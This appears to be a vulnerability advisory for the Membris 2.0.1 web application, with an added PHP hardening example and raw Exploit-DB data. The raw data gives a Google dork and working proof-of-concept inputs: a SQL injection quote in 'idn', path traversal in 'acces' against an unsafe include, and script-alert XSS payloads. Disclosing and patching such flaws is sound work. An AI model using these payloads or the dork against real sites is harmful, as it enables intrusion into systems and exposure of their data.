vendor: Membris
by: Dr.abolalh
CVSS: 5.5 (MEDIUM)
SQL Injection, Cross-Site Scripting (XSS), File Disclosure
CWE: 89, 79
Product Name: Membris
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2012

Membris v 2.0.1 SQL, XSS & File Disclosure Vulnerabilities

The Membris v 2.0.1 application is vulnerable to SQL Injection, XSS, and File Disclosure vulnerabilities. The SQL Injection vulnerability can be exploited through the 'voir-actualites.php' page by manipulating the 'idn' parameter. The XSS vulnerability can be exploited through the 'search.php' page by manipulating the 'req' parameter. The File Disclosure vulnerability can be exploited through the 'admin/actions-plugin.php' page by manipulating the 'acces' parameter.

Mitigation:

The vendor has not provided a patch for these vulnerabilities. To mitigate the risk, update to a newer version of the application or use different software.
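
Since no patch exists, the file disclosure in 'admin/actions-plugin.php' can be closed locally by no longer concatenating the 'acces' parameter straight into the include path (the include line is quoted in the raw data). The PHP below is an added example, not Membris code and not part of the original advisory; `resolve_plugin()`, the `galerie` plugin name and the temporary directory layout are assumptions constructed for the demonstration.

```php
<?php
// Added example: hardened replacement for
//   include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
// resolve_plugin() is a hypothetical helper, not part of Membris.

function resolve_plugin(string $pluginsDir, $name): ?string
{
    // 1. Accept only a plain directory name: no slashes, dots, NUL bytes or arrays.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. The plugins directory itself must exist.
    $base = realpath($pluginsDir);
    if ($base === false) {
        return null;
    }
    // 3. The plugin must be installed (realpath() fails on missing files) and,
    //    after symlink and ".." resolution, still sit under the plugins directory.
    $sep = DIRECTORY_SEPARATOR;
    $target = realpath($base . $sep . $name . $sep . 'fonctions.php');
    if ($target === false || strncmp($target, $base . $sep, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo layout in a temp directory so the script runs offline.
$root = sys_get_temp_dir() . '/membris_demo_' . bin2hex(random_bytes(4));
mkdir("$root/plugins/galerie", 0700, true);
file_put_contents("$root/plugins/galerie/fonctions.php", "<?php // constructed plugin stub\n");
file_put_contents("$root/index.php", "<?php // constructed file outside plugins/\n");

// Constructed inputs: one valid plugin name and several values that must be refused.
foreach (['galerie', '../index.php', '..', "galerie\0", 'absent', ['x']] as $input) {
    $path = resolve_plugin("$root/plugins", $input);
    $verdict = $path === null ? 'rejected' : 'include ' . basename(dirname($path)) . '/fonctions.php';
    printf("%-18s => %s\n", json_encode($input), $verdict);
}

// Remove the constructed demo files again.
unlink("$root/plugins/galerie/fonctions.php");
unlink("$root/index.php");
rmdir("$root/plugins/galerie"); rmdir("$root/plugins"); rmdir($root);

// In the page handler the call would look like:
//   $file = resolve_plugin(__DIR__ . '/../plugins', $_GET['acces'] ?? null);
//   if ($file === null) { http_response_code(400); exit; }
//   include $file;
```

The same approach of validating before use applies to the other two parameters: 'idn' belongs in a parameterized query and 'req' should be HTML-encoded on output.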

Exploit-DB raw data:

###################################
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Author:01/06/2012
# E-Mail: xa3@hotmail.com
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
# Version: Membris v 2.0.1
###################################

# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.



SQL:
voir-actualites.php

Exploit:
voir-actualites.php?idn=1 '

+-----------------------------------------------------------+

File Inclusion


include ("../plugins/" . $_GET['acces'] . "/fonctions.php");

Exploit:
admin/actions-plugin.php?acces=../index.php

+-----------------------------------------------------------+

XSS
search.php

Exploit:
search.php?req= XSS

search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+

#+--------------------------------------------------+#
# Greetz to : sec4ever                                   #
#---------------------------------------------------+#